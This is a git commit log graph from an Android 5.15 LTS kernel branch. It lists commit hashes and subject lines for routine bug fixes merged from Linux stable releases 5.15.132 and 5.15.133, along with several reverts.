| * 13ea4b92e875 x86/srso: Fix SBPB enablement for spec_rstack_overflow=off
| * e2c34afe8362 x86/srso: Fix srso_show_state() side effect
| * 21efa88e777f platform/x86: intel_scu_ipc: Fail IPC send if still busy
| * 0a5d236b52cf platform/x86: intel_scu_ipc: Don't override scu in intel_scu_ipc_dev_simple_command()
| * ab78000c38b4 platform/x86: intel_scu_ipc: Check status upon timeout in ipc_wait_for_interrupt()
| * 47329633b3f0 platform/x86: intel_scu_ipc: Check status after timeout in busy_loop()
| * 26df9ab5de30 dccp: fix dccp_v4_err()/dccp_v6_err() again
| * 3b14e8431855 powerpc/perf/hv-24x7: Update domain value check
| * 8860d354f653 ipv4: fix null-deref in ipv4_link_failure
| * c196ecd3f893 igc: Fix infinite initialization loop with early XDP redirect
| * a2d69dcb6ccb ionic: fix 16bit math issue when PAGE_SIZE >= 64KB
| * 3796e449a03e i40e: Fix VF VLAN offloading when port VLAN is configured
| * a628f3b5cd8d i40e: Add VF VLAN pruning
| * 7a9eee3b5d4d iavf: do not process adminq tasks when __IAVF_IN_REMOVE_TASK is set
| * f3c6a17900e8 ASoC: imx-audmix: Fix return error with devm_clk_get()
| * f90a7b9586d7 net/core: Fix ETH_P_1588 flow dissector
| * 55629e616452 selftests: tls: swap the TX and RX sockets in some tests
| * acabf5df49aa bpf: Avoid deadlock when using queue and stack maps from NMI
| * c6e44f4c31c5 netfilter: nf_tables: disallow element removal on anonymous sets
| * 6a8de7775329 ASoC: meson: spdifin: start hw on dai probe
| * ef99506eaf1d netfilter: nf_tables: fix memleak when more than 255 elements expired
| * 8d7a00b904da netfilter: nft_set_hash: try later when GC hits EAGAIN on iteration
| * 83d3a4607c58 netfilter: nft_set_pipapo: stop GC iteration if GC transaction allocation fails
| * 949369f9f0d9 netfilter: nft_set_pipapo: call nft_trans_gc_queue_sync() in catchall GC
| * 2e6846b613fa netfilter: nft_set_rbtree: use read spinlock to avoid datapath contention
| * 9af7dfb3c9d7 netfilter: nft_set_rbtree: skip sync GC for new elements in this transaction
| * 9366966caf1a netfilter: nf_tables: defer gc run if previous batch is still pending
| * 082791b42123 netfilter: nf_tables: use correct lock to protect gc_list
| * b44a459c6561 netfilter: nf_tables: GC transaction race with abort path
| * 24707fa1e1f9 netfilter: nf_tables: GC transaction race with netns dismantle
| * 6796800f0d8e netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
| * af78b0489e88 netfilter: nf_tables: don't fail inserts if duplicate has expired
| * 8f24fe69e3ca netfilter: nf_tables: remove busy mark and gc batch API
| * b290795bd26f netfilter: nft_set_hash: mark set element as dead when deleting from packet path
| * 479a2cf52593 netfilter: nf_tables: adapt set backend to use GC transaction API
| * d19e8bf3ea41 netfilter: nf_tables: GC transaction API to avoid race with control plane
| * 7c7e658a36f8 netfilter: nf_tables: don't skip expired elements during walk
| * a2d1125ee04e tracing: Have event inject files inc the trace array ref count
| * 6b6c088c38f7 ext4: do not let fstrim block system suspend
| * a9d3bb58da95 ext4: move setting of trimmed bit into ext4_try_to_trim_range()
| * d91abea15c61 ext4: replace the traditional ternary conditional operator with with max()/min()
| * 656f0495e4ac ext4: change s_last_trim_minblks type to unsigned long
| * be57857fb3c3 ext4: scope ret locally in ext4_try_to_trim_range()
| * e832b55881a1 ata: libahci: clear pending interrupt status
| * f6189f373151 ata: ahci: Drop pointless VPRINTK() calls and convert the remaining ones
| * fa6d449e4d02 tracing: Increase trace array ref count on enable and filter files
| * 7a688f191a17 tracing: Make trace_marker{,_raw} stream-like
| * 68fc0e75c793 NFSv4.1: fix pnfs MDS=DS session trunking
| * 0ff78c455494 NFSv4.1: use EXCHGID4_FLAG_USE_PNFS_DS for DS server
| * d381bfe13895 SUNRPC: Mark the cred for revalidation if the server rejects it
| * f1c434ddafe6 NFS/pNFS: Report EINVAL errors from connect() to the server
| * 0c0a7e1f2a6a NFS: More fixes for nfs_direct_write_reschedule_io()
| * a354b4a367f5 NFS: Use the correct commit info in nfs_join_page_group()
* | 51c330012b68 Revert "usb: ehci: add workaround for chipidea PORTSC.PEC bug"
* | c70292cc4ffd Merge 5.15.133 into android13-5.15-lts
|\|
| * b911329317b4 Linux 5.15.133
| * e3a29b80e9e6 interconnect: Teach lockdep about icc_bw_lock order
| * c6244cd00c97 drm/amd/display: enable cursor degamma for DCN3+ DRM legacy gamma
| * 08569c92f7f3 net/sched: Retire rsvp classifier
| * 6b080fa8aae1 drm/amdgpu: fix amdgpu_cs_p1_user_fence
| * 6386a2d4dc01 drm/amd/display: fix the white screen issue when >= 64GB DRAM
| * e04b7073bdce ext4: fix rec_len verify error
| * 93763d58705a scsi: pm8001: Setup IRQs on resume
| * 72a22696cf19 scsi: megaraid_sas: Fix deadlock on firmware crashdump
| * 54603e8a88bc ata: libata: disallow dev-initiated LPM transitions to unsupported states
| * 01c7c38a90bc i2c: aspeed: Reset the i2c controller when timeout occurs
| * 763d39f4e8fb tracefs: Add missing lockdown check to tracefs_create_dir()
| * bf195968e362 nfsd: fix change_info in NFSv4 RENAME replies
| * bf38c1d29f8b tracing: Have option files inc the trace array ref count
| * 85ad4688b7a7 tracing: Have current_trace inc the trace array ref count
| * 962e6723239b tracing: Have tracing_max_latency inc the trace array ref count
| * 380bbd46d61c btrfs: release path before inode lookup during the ino lookup ioctl
| * 779c3cf2749c btrfs: fix lockdep splat and potential deadlock after failure running delayed items
| * f9c78afcee46 ovl: fix incorrect fdput() on aio completion
| * 05a7289a5d4b ovl: fix failed copyup of fileattr on a symlink
| * 8bcb80293be7 attr: block mode changes of symlinks
| * d30af15e460f md/raid1: fix error: ISO C90 forbids mixed declarations
| * abdfde037712 samples/hw_breakpoint: fix building without module unloading
| * 58787ff3d023 x86/purgatory: Remove LTO flags
| * 8abf1ec895d5 x86/boot/compressed: Reserve more memory for page tables
| * e1a27664fcf5 scsi: lpfc: Fix the NULL vs IS_ERR() bug for debugfs_create_file()
| * f0fd24f1fae0 selftests: tracing: Fix to unmount tracefs for recovering environment
| * dded6b81ad68 scsi: qla2xxx: Fix NULL vs IS_ERR() bug for debugfs_create_dir()
| * 1d5caeac9655 drm: gm12u320: Fix the timeout usage for usb_bulk_msg()
| * b9f0572b38c1 btrfs: compare the correct fsid/metadata_uuid in btrfs_validate_super
| * cba491ee38e2 btrfs: add a helper to read the superblock metadata_uuid
| * cb3671a2eeac btrfs: move btrfs_pinned_by_swapfile prototype into volumes.h
| * f16fe29368fd perf test shell stat_bpf_counters: Fix test on Intel
| * ad73216e006f perf test: Remove bash construct from stat_bpf_counters.sh test
| * d8f81baeb9eb MIPS: Use "grep -E" instead of "egrep"
| * dfe961b1e476 mtd: rawnand: brcmnand: Fix ECC level field setting for v7.2 controller
| * 56cf9f446b33 mtd: rawnand: brcmnand: Allow SoC to provide I/O operations
| * 34fcb59437a7 jbd2: correct the end of the journal recovery scan range
| * a4605449cc9f jbd2: rename jbd_debug() to jbd2_debug()
| * db6c90f2671c jbd2: kill t_handle_lock transaction spinlock
| * e9270898222a jbd2: fix use-after-free of transaction_t race
| * b0412dd1c24b jbd2: refactor wait logic for transaction updates into a common function
| * f980bf1586ef printk: Consolidate console deferred printing
| * 9be2957f014d interconnect: Fix locking for runpm vs reclaim
| * f3f6bf22a4f5 kobject: Add sanity check for kset->kobj.ktype in kset_register()
| * 81bbe6667024 media: pci: ipu3-cio2: Initialise timing struct to avoid a compiler warning
| * d4ef3c9c7947 usb: ehci: add workaround for chipidea PORTSC.PEC bug
| * c829d25e26fb serial: cpm_uart: Avoid suspicious locking
| * 5353df78c226 scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show()
| * b97aaf9faf89 tools: iio: iio_generic_buffer: Fix some integer type and calculation
| * 60a71fd1910e usb: gadget: fsl_qe_udc: validate endpoint index for ch9 udc
| * c861a61be6d3 usb: cdns3: Put the cdns set active part outside the spin lock
| * 930c60e13947 media: pci: cx23885: replace BUG with error return
| * 48bb6a9fa5cb media: tuners: qt1010: replace BUG_ON with a regular error
| * 2a33fc57133d media: dvb-usb-v2: gl861: Fix null-ptr-deref in gl861_i2c_master_xfer
| * 5b1ea100ad36 media: az6007: Fix null-ptr-deref in az6007_i2c_xfer()
| * 3dd5846a8739 media: anysee: fix null-ptr-deref in anysee_master_xfer
| * 033b0c0780ad media: af9005: Fix null-ptr-deref in af9005_i2c_xfer
| * 903566208ae6 media: dw2102: Fix null-ptr-deref in dw2102_i2c_transfer()
| * d9ef84a7c222 media: dvb-usb-v2: af9035: Fix null-ptr-deref in af9035_i2c_master_xfer
| * ca49cef3acaa PCI: fu740: Set the number of MSI vectors
| * d35e7ae10eb8 powerpc/pseries: fix possible memory leak in ibmebus_bus_init()
| * 46870eea5496 ARM: 9317/1: kexec: Make smp stop calls asynchronous
| * ef7311101ca4 jfs: fix invalid free of JFS_IP(ipimap)->i_imap in diUnmount
| * aa5b019a3e0f fs/jfs: prevent double-free in dbUnmount() after failed jfs_remount()
| * 7ac65c29b6c2 ext2: fix datatype of block number in ext2_xattr_set2()
| * 4f96c0665f9f md: raid1: fix potential OOB in raid1_remove_disk()
| * f3e9fc7b02b9 bus: ti-sysc: Configure uart quirks for k3 SoC
| * 3157aa794c75 drm/exynos: fix a possible null-pointer dereference due to data race in exynos_drm_crtc_atomic_disable()
| * 78bc9d25997a drm/amd/display: Blocking invalid 420 modes on HDMI TMDS for DCN31
| * 5eca70c14b31 ALSA: hda: intel-dsp-cfg: add LunarLake support
| * e8ba418d4926 samples/hw_breakpoint: Fix kernel BUG 'invalid opcode: 0000'
| * 961df5a3f5cc arm64: dts: qcom: sm8250-edo: correct ramoops pmsg-size
| * 49cd54900078 arm64: dts: qcom: sm8150-kumano: correct ramoops pmsg-size
| * 1e0a38bb840a arm64: dts: qcom: sm6125-pdx201: correct ramoops pmsg-size
| * 201071956ec6 drm/bridge: tc358762: Instruct DSI host to generate HSE packets
| * c64ee9dd3358 wifi: mac80211_hwsim: drop short frames
| * 66594a1e6ddd netfilter: ebtables: fix fortify warnings in size_entry_mwt()
| * fedd9377dd9c wifi: mac80211: check S1G action frame size
| * e08333e2abae alx: fix OOB-read compiler warning
| * 2b0a093cdf59 mmc: sdhci-esdhc-imx: improve ESDHC_FLAG_ERR010450
| * 0a1f87f0ca76 tpm_tis: Resend command to recover from data transfer errors
| * 67589d247909 crypto: lib/mpi - avoid null pointer deref in mpi_cmp_ui()
| * 389106425dee wifi: wil6210: fix fortify warnings
| * ddb8f358b5e0 wifi: mwifiex: fix fortify warning
| * a7ebe459c72e wifi: ath9k: fix printk specifier
| * 3de6b6ab69e2 wifi: ath9k: fix fortify warnings
| * 6b0adfafb073 crypto: lrw,xts - Replace strlcpy with strscpy
| * dc100292e503 devlink: remove reload failed checks in params get/set callbacks
| * 7b7964cd9db3 ACPI: x86: s2idle: Catch multiple ACPI_TYPE_PACKAGE objects
| * eda268b5b7ad hw_breakpoint: fix single-stepping when using bpf_overflow_handler
| * 6e743b7261ef perf/imx_ddr: speed up overflow frequency of cycle
| * f9a2c79c2970 perf/smmuv3: Enable HiSilicon Erratum 162001900 quirk for HIP08/09
| * ed1afb597280 ACPI: video: Add backlight=native DMI quirk for Lenovo Ideapad Z470
| * f685311dbe05 scftorture: Forgive memory-allocation failure if KASAN
| * 4f03fba096bf rcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle()
| * f1ceff37ac6b kernel/fork: beware of __put_task_struct() calling context
| * 430787056dd3 ACPICA: Add AML_NO_OPERAND_RESOLVE flag to Timer
| * 766e56faddbe locks: fix KASAN: use-after-free in trace_event_raw_event_filelock_lock
| * 6994f806c6d1 btrfs: output extra debug info if we failed to find an inline backref
| * 71eeddcad734 autofs: fix memory leak of waitqueues in autofs_catatonic_mode
* | 754f8cc9b7de Revert "pwm: atmel-tcb: Convert to platform remove callback returning void"
* | 12cff4ffca32 FROMLIST: lib/test_meminit: fix off-by-one error in test_pages()
* | 317df336a929 Revert "usb: typec: bus: verify partner exists in typec_altmode_attention"
* | 27839edcfe7a Revert "scsi: core: Use 32-bit hostnum in scsi_host_lookup()"
* | e296a90d28c0 Revert "fs/nls: make load_nls() take a const parameter"
* | 8ed010e1a8c0 Revert "tracing: Introduce pipe_cpumask to avoid race on trace_pipes"
* | 11e906694dc2 Revert "tracing: Zero the pipe cpumask on alloc to avoid spurious -EBUSY"
* | 07952c0be063 Revert "crypto: api - Use work queue in crypto_destroy_instance"
* | d0c27f008f19 Revert "ip_tunnels: use DEV_STATS_INC()"
* | f983580f42c9 Merge 5.15.132 into android13-5.15-lts
|\|
| * 35ecaa3632bf Linux 5.15.132
| * 0c0d79f3366a pcd: fix error codes in pcd_init_unit()
| * 893978f1b4d1 drm/amd/display: Fix a bug when searching for insert_above_mpcc
| * 0b8e09b39ef3 MIPS: Only fiddle with CHECKFLAGS if `need-compiler'
| * 55d2e7c1ab8e kcm: Fix error handling for SOCK_DGRAM in kcm_sendmsg().
| * e80228b27487 ixgbe: fix timestamp configuration code
| * 5b55dac919ec ipv6: fix ip6_sock_set_addr_preferences() typo
| * 481bd6dcc5fe net/tls: do not free tls_rec on async operation in bpf_exec_tx_verdict()
| * 3600c0dc0deb platform/mellanox: mlxbf-pmc: Fix reading of unprogrammed events
| * 07c0abc80604 platform/mellanox: mlxbf-pmc: Fix potential buffer overflows
| * 7c34ea34516d platform/mellanox: mlxbf-tmfifo: Drop jumbo frames
| * 694035201aac platform/mellanox: mlxbf-tmfifo: Drop the Rx packet if no more descriptors
| * 97275339c34c kcm: Fix memory leak in error path of kcm_sendmsg()
| * 864da4a5d5eb r8152: check budget for r8152_poll()
| * fbdc4e9908b2 net: dsa: sja1105: hide all multicast addresses from "bridge fdb show"
| * 6a4480c5e6eb hsr: Fix uninit-value access in fill_frame_info()
| * 072324cfab9b net: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all()
| * 5bb09dddc724 net: ethernet: mvpp2_main: fix possible OOB write in mvpp2_ethtool_get_rxnfc()
| * 06b4934ab2b5 net/smc: use smc_lgr_list.lock to protect smc_lgr_list.list iterate in smcr_port_add
| * aea3801c234d kselftest/runner.sh: Propagate SIGTERM to runner child
| * 2f1e86014d0c net: ipv4: fix one memleak in __inet_del_ifa()
| * f086e859ddc2 ARM: dts: BCM5301X: Extend RAM to full 256MB for Linksys EA6500 V2
| * 8173d9027031 ARM: dts: samsung: exynos4210-i9100: Fix LCD screen's physical size
| * 072cd213c64f block: don't add or resize partition on the disk with GENHD_FL_NO_PART
| * c6ce1c5dd327 block: rename GENHD_FL_NO_PART_SCAN to GENHD_FL_NO_PART
| * 6c06a7f6b41c block: move GENHD_FL_BLOCK_EVENTS_ON_EXCL_WRITE to disk->event_flags
| * 8247ff0d5036 block: move GENHD_FL_NATIVE_CAPACITY to disk->state
| * 5ad42b999a42 pcd: cleanup initialization
| * 7607bc7fe6cc pcd: move the identify buffer into pcd_identify
| * 242bbe218814 perf hists browser: Fix the number of entries for 'e' key
| * 4d7a8a44e030 perf tools: Handle old data in PERF_RECORD_ATTR
| * a8f91f480c62 perf hists browser: Fix hierarchy mode header
| * 4ee1cf2a5bcc MIPS: Fix CONFIG_CPU_DADDI_WORKAROUNDS `modules_install' regression
| * df4d8d5ab647 drm/amd/display: prevent potential division by zero errors
| * 3b51d016bbbf mtd: rawnand: brcmnand: Fix potential false time out warning
| * 2353b7bb61e4 mtd: rawnand: brcmnand: Fix potential out-of-bounds access in oob write
| * b59ff750bf80 mtd: rawnand: brcmnand: Fix crash during the panic_write
| * ca5218aef9e5 btrfs: use the correct superblock to compare fsid in btrfs_validate_super
| * f3260733894a btrfs: don't start transaction when joining with TRANS_JOIN_NOSTART
| * 7ef0e8b812e0 btrfs: free qgroup rsv on io failure
| * 5fd6f40d17e8 fuse: nlookup missing decrement in fuse_direntplus_link
| * 65b6890c3d01 ata: pata_ftide010: Add missing MODULE_DESCRIPTION
| * 0b62825dc6c3 ata: sata_gemini: Add missing MODULE_DESCRIPTION
| * 81dd61cb1caa ata: pata_falcon: fix IO base selection for Q40
| * 20bc2c470369 lib: test_scanf: Add explicit type cast to result initialization in test_number_prefix()
| * 4315b4a95ecf ext4: add correct group descriptors and reserved GDT blocks to system zone
| * ef5fea70e591 jbd2: check 'jh->b_transaction' before removing it from checkpoint
| * 6778a3857266 jbd2: fix checkpoint cleanup performance regression
| * 6b195e07a2cf dmaengine: sh: rz-dmac: Fix destination and source data size setting
| * 0476f2016ddc ARC: atomics: Add compiler barrier to atomic operations...
| * 3375186d5e3f net/mlx5: Free IRQ rmap and notifier on kernel shutdown
| * 2348a375ee16 sh: boards: Fix CEU buffer size passed to dma_declare_coherent_memory()
| * f5160dc17e81 net: hns3: remove GSO partial feature bit
| * 6d548b7cb216 net: hns3: fix the port information display when sfp is absent
| * cc3c67e08169 net: hns3: fix invalid mutex between tc qdisc and dcb ets command issue
| * 2c9643fa6360 net: hns3: fix debugfs concurrency issue between kfree buffer and read
| * 8bfa87cf4a86 net: hns3: fix byte order conversion issue in hclge_dbg_fd_tcam_read()
| * 19280e8dfb52 netfilter: nfnetlink_osf: avoid OOB read
| * 1ad7b189cc14 netfilter: nftables: exthdr: fix 4-byte stack OOB write
| * 347f765176db net: dsa: sja1105: complete tc-cbs offload support on SJA1110
| * cb4494cfe4b7 net: dsa: sja1105: fix -ENOSPC when replacing the same tc-cbs too many times
| * 77b850b84d21 net: dsa: sja1105: fix bandwidth discrepancy between tc-cbs software and offload
| * d11109c03d6e ip_tunnels: use DEV_STATS_INC()
| * fcfb5842ef9c idr: fix param name in idr_alloc_cyclic() doc
| * 131cd74a8e38 s390/zcrypt: don't leak memory if dev_set_name() fails
| * 12de76fdddb5 igb: Change IGB_MIN to allow set rx/tx value between 64 and 80
| * 7c2f90b1c213 igbvf: Change IGBVF_MIN to allow set rx/tx value between 64 and 80
| * f4c5640d6d38 igc: Change IGC_MIN to allow set rx/tx value between 64 and 80
| * 9210b3dd74ac octeontx2-af: Fix truncation of smq in CN10K NIX AQ enqueue mbox handler
| * 1840f08c2a1b kcm: Destroy mutex in kcm_exit_net()
| * 6ea277b2c626 net: sched: sch_qfq: Fix UAF in qfq_dequeue()
| * 3868de7c5361 af_unix: Fix data race around sk->sk_err.
| * d95456660fae af_unix: Fix data-races around sk->sk_shutdown.
| * e5edc6e44a88 af_unix: Fix data-race around unix_tot_inflight.
| * 9151ed4b0061 af_unix: Fix data-races around user->unix_inflight.
| * 907fbed65cec net: phy: micrel: Correct bit assignments for phy_device flags
| * 5d2d3f2300c3 net: ipv6/addrconf: avoid integer underflow in ipv6_create_tempaddr
| * 77dd55f5ec6a veth: Fixing transmit return status for dropped packets
| * 56603b2c82e3 igb: disable virtualization features on 82580
| * 149bc7834d6f ipv4: ignore dst hint for multipath routes
| * e18b49495a52 drm/i915/gvt: Drop unused helper intel_vgpu_reset_gtt()
| * 5979985f2d6b xsk: Fix xsk_diag use-after-free error during socket cleanup
| * 49acc5c5b280 net: fib: avoid warn splat in flow dissector
| * ed4e0adfa407 net: read sk->sk_family once in sk_mc_loop()
| * e0b483a0584f ipv4: annotate data-races around fi->fib_dead
| * 74df0319e4e2 sctp: annotate data-races around sk->sk_wmem_queued
| * 973a4c302d7f net/sched: fq_pie: avoid stalls in fq_pie_timer()
| * 5e22217c1142 pwm: lpc32xx: Remove handling of PWM channels
| * 676152264dec watchdog: intel-mid_wdt: add MODULE_ALIAS() to allow auto-load
| * d6aa2be1379d perf top: Don't pass an ERR_PTR() directly to perf_session__delete()
| * 79bd17c99ec9 perf vendor events: Drop some of the JSON/events for power10 platform
| * 1356eaceef34 perf vendor events: Update the JSON/events descriptions for power10 platform
| * 24481d5c7413 x86/virt: Drop unnecessary check on extended CPUID level in cpu_has_svm()
| * 6e9863165674 perf annotate bpf: Don't enclose non-debug code with an assert()
| * 184be0d59242 Input: tca6416-keypad - fix interrupt enable disbalance
| * 0b79f5a19cfb Input: tca6416-keypad - always expect proper IRQ number in i2c client
| * 1e3167aa4ba2 backlight: gpio_backlight: Drop output GPIO direction check for initial power state
| * 6fc8bdc3cf4c pwm: atmel-tcb: Fix resource freeing in error path and remove
| * 6b2bb1a1a63c pwm: atmel-tcb: Harmonize resource allocation order
| * d4734ef765eb pwm: atmel-tcb: Convert to platform remove callback returning void
| * c3bc668581e7 perf trace: Really free the evsel->priv area
| * 8e96f741b328 perf trace: Use zfree() to reduce chances of use after free
| * 414cf7a2cc87 kconfig: fix possible buffer overflow
| * be9ce0dbde4f gfs2: low-memory forced flush fixes
| * 751facd3634c gfs2: Switch to wait_event in gfs2_logd
| * d0245b066971 kbuild: do not run depmod for 'make modules_sign'
| * 05333a6a21e3 bus: mhi: host: Skip MHI reset if device is in RDDM
| * e2964c98ec31 NFSv4/pnfs: minor fix for cleanup path in nfs4_get_device_info
| * da302f1d476a NFS: Fix a potential data corruption
| * 0db19df21be5 clk: qcom: mss-sc7180: fix missing resume during probe
| * f64f682be7c8 clk: qcom: q6sstop-qcs404: fix missing resume during probe
| * b2f39b813d1e soc: qcom: qmi_encdec: Restrict string length in decode
| * e61db8922631 clk: qcom: gcc-mdm9615: use proper parent for pll0_vote clock
| * a8474506c912 clk: imx: pll14xx: dynamically configure PLL for 393216000/361267200Hz
| * a69b951c8398 dt-bindings: clock: xlnx,versal-clk: drop select:false
| * ead2436cf05e pinctrl: cherryview: fix address_space_handler() argument
| * 8859f58c1790 parisc: led: Reduce CPU overhead for disk & lan LED computation
| * 2655e1d970cf parisc: led: Fix LAN receive and transmit LEDs
| * 7ad44409cd3b lib/test_meminit: allocate pages up to order MAX_ORDER
| * 2d8138cea71d clk: qcom: turingcc-qcs404: fix missing resume during probe
| * 9f5db4ab19f8 drm/ast: Fix DRAM init on AST2200
| * cfc47807a482 clk: qcom: camcc-sc7180: fix async resume during probe
| * 309c27162afe fbdev/ep93xx-fb: Do not assign to struct fb_info.dev
| * 4316e951f164 scsi: qla2xxx: Fix firmware resource tracking
| * 7b89c3727bff scsi: qla2xxx: Error code did not return to upper layer
| * 15a71bb25beb scsi: qla2xxx: Fix smatch warn for qla_init_iocb_limit()
| * 106392156273 scsi: qla2xxx: Flush mailbox commands on chip reset
| * def49a05aef4 scsi: qla2xxx: Remove unsupported ql2xenabledif option
| * be12c9f4c60c scsi: qla2xxx: Fix TMF leak through
| * 4322f3de9f21 scsi: qla2xxx: Fix session hang in gnl
| * a4708402c458 scsi: qla2xxx: Turn off noisy message log
| * b0453b0cf506 scsi: qla2xxx: Fix erroneous link up failure
| * 5934b2125f5b scsi: qla2xxx: Fix command flush during TMF
| * 4a16a46c8481 scsi: qla2xxx: fix inconsistent TMF timeout
| * f1ea164be545 scsi: qla2xxx: Fix deletion race condition
| * 683945b17724 scsi: qla2xxx: Limit TMF to 8 per function
| * fde268c234d1 scsi: qla2xxx: Adjust IOCB resource on qpair create
| * c29848249f78 io_uring: break iopolling on signal
| * 0def123f1254 io_uring: break out of iowq iopoll on teardown
| * 1a0aba2bf293 io_uring: always lock in io_apoll_task_func
| * 2920cc4c64a1 net/ipv6: SKB symmetric hash should incorporate transport ports
| * 529bcc70c49c udf: initialize newblock to 0
| * fae2d591f3cb Revert "drm/amdgpu: install stub fence into potential unused fence pointers"
| * f01e21d6c7ed md/md-bitmap: remove unnecessary local variable in backlog_store()
| * 99a8d14d7965 tracing: Zero the pipe cpumask on alloc to avoid spurious -EBUSY
| * 05c581ad3e7b perf/x86/uncore: Correct the number of CHAs on EMR
| * 861cfdc51f22 x86/sgx: Break up long non-preemptible delays in sgx_vepc_release()
| * 7e3ddbea87a9 USB: core: Fix oversight in SuperSpeed initialization
| * 7fe9d8799606 USB: core: Fix race by not overwriting udev->descriptor in hub_port_init()
| * eda9a2966582 USB: core: Change usb_get_device_descriptor() API
| * 56c49a3328e9 USB: core: Unite old scheme and new scheme descriptor reads
| * 0ad6bad31da6 usb: typec: bus: verify partner exists in typec_altmode_attention
| * 31220bd89c22 usb: typec: tcpm: set initial svdm version based on pd revision
| * 3acc6b9f266f cpufreq: brcmstb-avs-cpufreq: Fix -Warray-bounds bug
| * cb65ad51f1bd crypto: stm32 - fix loop iterating through scatterlist for DMA
| * 9ab2c149c2e7 s390/ipl: add missing secure/has_secure file to ipl type 'unknown'
| * 6aff2732577c arm64: sdei: abort running SDEI handlers during crash
| * fedecaeef888 pstore/ram: Check start of empty przs during init
| * 8d68582b93e6 mmc: renesas_sdhi: register irqs before registering controller
| * 5294144b6ad2 fsverity: skip PKCS#7 parser when keyring is empty
| * 86608e1b0c6f net: handle ARPHRD_PPP in dev_is_mac_header_xmit()
| * 51ffed9ca1a4 X.509: if signature is unsupported skip validation
| * 6ecf09699eb1 dccp: Fix out of bounds access in DCCP error handler
| * 7a2978e8d3c0 dlm: fix plock lookup when using multiple lockspaces
| * 703cf47d47ba parisc: Fix /proc/cpuinfo output for lscpu
| * 49a49d442075 procfs: block chmod on /proc/thread-self/comm
| * 44f6ec589353 Revert "PCI: Mark NVIDIA T4 GPUs to avoid bus reset"
| * d73d3787c9d1 ntb: Fix calculation ntb_transport_tx_free_entry()
| * da0c7293f4db ntb: Clean up tx tail index on link down
| * bfa051f650a7 ntb: Drop packets when qp link is down
| * 8f4edcd65534 scsi: mpt3sas: Perform additional retries if doorbell read returns 0
| * 58388f2958f6 Revert "scsi: qla2xxx: Fix buffer overrun"
| * bd188d1e3855 media: venus: hfi_venus: Write to VIDC_CTRL_INIT after unmasking interrupts
| * 6e9632a01e6d media: dvb: symbol fixup for dvb_attach()
| * 9a43563cfd6b arm64: csum: Fix OoB access in IP checksum code for negative lengths
| * a0a49da2a79a i3c: master: svc: fix probe failure when no i3c device exist
| * a905ac21b2ab xtensa: PMU: fix base address for the newer hardware
| * 8742dbf9c25d backlight/lv5207lp: Compare against struct fb_info.device
| * 568132f74cb1 backlight/bd6107: Compare against struct fb_info.device
| * 4e7b4ddc900c backlight/gpio_backlight: Compare against struct fb_info.device
| * 3b018c3d1016 ARM: OMAP2+: Fix -Warray-bounds warning in _pwrdm_state_switch()
| * cbb7d8a4b4be ipmi_si: fix a memleak in try_smi_init()
| * 6043dd31f771 PCI: rockchip: Use 64-bit mask on MSI 64-bit PCI address
| * aba1bf197467 media: i2c: ccs: Check rules is non-NULL
| * df64819dd6a0 mm/vmalloc: add a safer version of find_vm_area() for debug
| * 20b7d0a62ad1 scsi: core: Fix the scsi_set_resid() documentation
| * 20990d6a8543 printk: ringbuffer: Fix truncating buffer size min_t cast
| * 0a22f9c17b1a rcu: dump vmalloc memory info safely
| * d479c841b18d ALSA: pcm: Fix missing fixup call in compat hw_refine ioctl
| * 111bafa210ae PM / devfreq: Fix leak in devfreq_dev_release()
| * be7353af5b35 igb: set max size RX buffer when store bad packet is enabled
| * d5790386595d skbuff: skb_segment, Call zero copy functions before using skbuff frags
| * 267a29f8bfdb netfilter: xt_sctp: validate the flag_info count
| * b3d07714ad24 netfilter: xt_u32: validate user space input
| * a9e6142e5f8f netfilter: ipset: add the missing IP_SET_HASH_WITH_NET0 macro for ip_set_hash_netportnet.c
| * 3e48f741e98a igmp: limit igmpv3_newpack() packet size to IP_MAX_MTU
| * de16cb7986f2 virtio_ring: fix avail_wrap_counter in virtqueue_add_packed
| * d6f80ddb9eda cpufreq: Fix the race condition while updating the transition_task of policy
| * 42d8c7fa0bf6 dmaengine: ste_dma40: Add missing IRQ check in d40_probe
| * 329d0f168c8f um: Fix hostaudio build errors
| * 58d17e766093 mtd: rawnand: fsmc: handle clk prepare error in fsmc_nand_resume()
| * 679a71b31179 mtd: spi-nor: Check bus width while setting QE bit
| * 8869fd166f23 leds: trigger: tty: Do not use LED_ON/OFF constants, use led_blink_set_oneshot instead
| * 0f715ea7d36e leds: multicolor: Use rounded division when calculating color components
| * 1a68bef23726 leds: pwm: Fix error code in led_pwm_create_fwnode()
| * abd740db896b rpmsg: glink: Add check for kstrdup
| * b45cf29f97a2 phy/rockchip: inno-hdmi: do not power on rk3328 post pll on reg write
| * 40d637359f3f phy/rockchip: inno-hdmi: round fractal pixclock in rk3328 recalc_rate
| * 52942a47d034 phy/rockchip: inno-hdmi: use correct vco_div_5 macro on rk3328
| * 31d7e6c7689b mtd: rawnand: brcmnand: Fix mtd oobsize
| * 6182318ac046 tracing: Fix race issue between cpu buffer write and swap
| * 548f48ec1915 tracing: Remove extra space at the end of hwlat_detector/mode
| * 2ba8bb00720a x86/speculation: Mark all Skylake CPUs as vulnerable to GDS
| * dde88ab4e45b HID: multitouch: Correct devm device reference for hidinput input_dev name
| * 4fb28379b3c7 HID: logitech-dj: Fix error handling in logi_dj_recv_switch_to_dj_mode()
| * 1bb42aca7a96 Revert "IB/isert: Fix incorrect release of isert connection"
| * 4f1807fddd9b amba: bus: fix refcount leak
| * 1c3701373463 serial: tegra: handle clk prepare error in tegra_uart_hw_init()
| * 076fb40cf27a scsi: fcoe: Fix potential deadlock on &fip->ctlr_lock
| * c4772759abe1 scsi: core: Use 32-bit hostnum in scsi_host_lookup()
| * 6248f4305378 cgroup:namespace: Remove unused cgroup_namespaces_init()
| * 04824d50e6b5 media: i2c: rdacm21: Fix uninitialized value
| * f3572eef8551 media: ov2680: Fix regulators being left enabled on ov2680_power_on() errors
| * 205f71744176 media: ov2680: Fix ov2680_set_fmt() which == V4L2_SUBDEV_FORMAT_TRY not working
| * 89ecb4b40094 media: ov2680: Add ov2680_fill_format() helper function
| * 784d1b83ae2c media: ov2680: Don't take the lock for try_fmt calls
| * dbb717b4ee68 media: ov2680: Remove VIDEO_V4L2_SUBDEV_API ifdef-s
| * 4c1a5c2885d4 media: ov2680: Fix vflip / hflip set functions
| * 958905ed42b8 media: ov2680: Fix ov2680_bayer_order()
